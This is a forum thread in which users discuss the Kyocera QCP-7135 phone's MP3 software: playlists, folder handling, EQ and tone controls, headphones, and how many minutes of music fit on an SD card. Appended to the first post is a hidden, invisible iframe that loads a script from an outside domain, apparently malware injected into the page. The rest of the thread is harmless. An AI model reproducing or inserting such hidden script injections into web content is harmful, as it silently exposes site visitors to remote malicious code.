I'm curious about the mp3 software included with the 7135. What playback features does it offer? Random play from all the files on an SD card? Does it recognize folders on an SD card? Can you set it to play just the files within one particular folder? Does it work with m3u pointers and playlists? Does it create its own playlists? What kind of manual or help file does the software include? Could somebody upload the docs for the player?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
THe MP3 player creates it's own playlist. The MP3's must be in the correct folder (which is done automaticly when transfering them to the device from the desktop using the Kyocera MP3 desktop).
Once you have used the Kyocera MP3 app to get your music in there, you can view the file hiarchey throught the file manager on the handset, or through an MMC/SD reader/writer connected to a PC. At that point you can copy MP3's to the card anyway you like and plug them in the handset.
Does the included software recognize ID3 tags? And what is the status of the developer's guide for the 7135? Anyone have any idea when THAT will be released?
I think the Kyocera QCP-7135 is a great looking unit and I think the MP3 thing is a great idea if the battery drain is not to bad (I would love to leave my Discman home and just enjoy music from the phone).
I must say though, I just hope that they do the right thing and include tone controls or EQ in the software for the MP3 player so that you can get some decent sound out of this thing. I would imagine that this thing must sound pretty flat without some bass and treble boost.

Well you could do it the hard way , Get a External EQ like The Koss EQ 50 but then you got one more thing to carry around :p I asume someone will be able to make a software EQ when the SDK is released.. hopefully
I would argue that using those tone controls will only make it sound worse.
Get yourself some Grado SR-60 headphones or Koss PortaPro headphones, and you'll never want to mess with those controls. I get pretty decent sound out of just about everything except the cheapest CD players with audible interference
A non-smartphone user (hehe...) would have to spend about 5 minutes with my equipment to find its tone controls (in high end stereo units they are buried very deep inside menus for this very reason).

Treble, bass, balance, and volume are available in the menu.

Thanks for the info HoTSynC,
It's makes me very happy to hear that the EQ is in there, my god, now I really cant wait to get one
How many minutes of music at 128kbps/stereo will fit on a 256k card?
Does the 7135 handle mono mp3s? Can you fit twice as many minutes on a card if they're recorded at 128 mono? I have a lot of old jazz recordings that would do just fine at 128 mono.
What I want to know is if RealPlayer will add support to load songs onto it. Even a simple SD card transfer. Why you ask? Because it can put mp3s onto a device all at a set bitrate, usually lower, guaranteeing a longer playtime at a little sacrifice of bitrate. I have it turn all my 192-320kbps VBR mp3s to 96kbps before I load them on my cheap player. Of course, it only supports 32MB smbc's, I'm sure a 256MB SD card would be more than enough for me.
Originally posted by Robert K. The rule of thumb most people go by (that I've seen) is 1mb per 1 minute. So that would mean about 64 songs on 256mb cards. Not too bad really.
True, but you can really reduce the bit rate to 70-90 and still maintain good sound to fit more in.
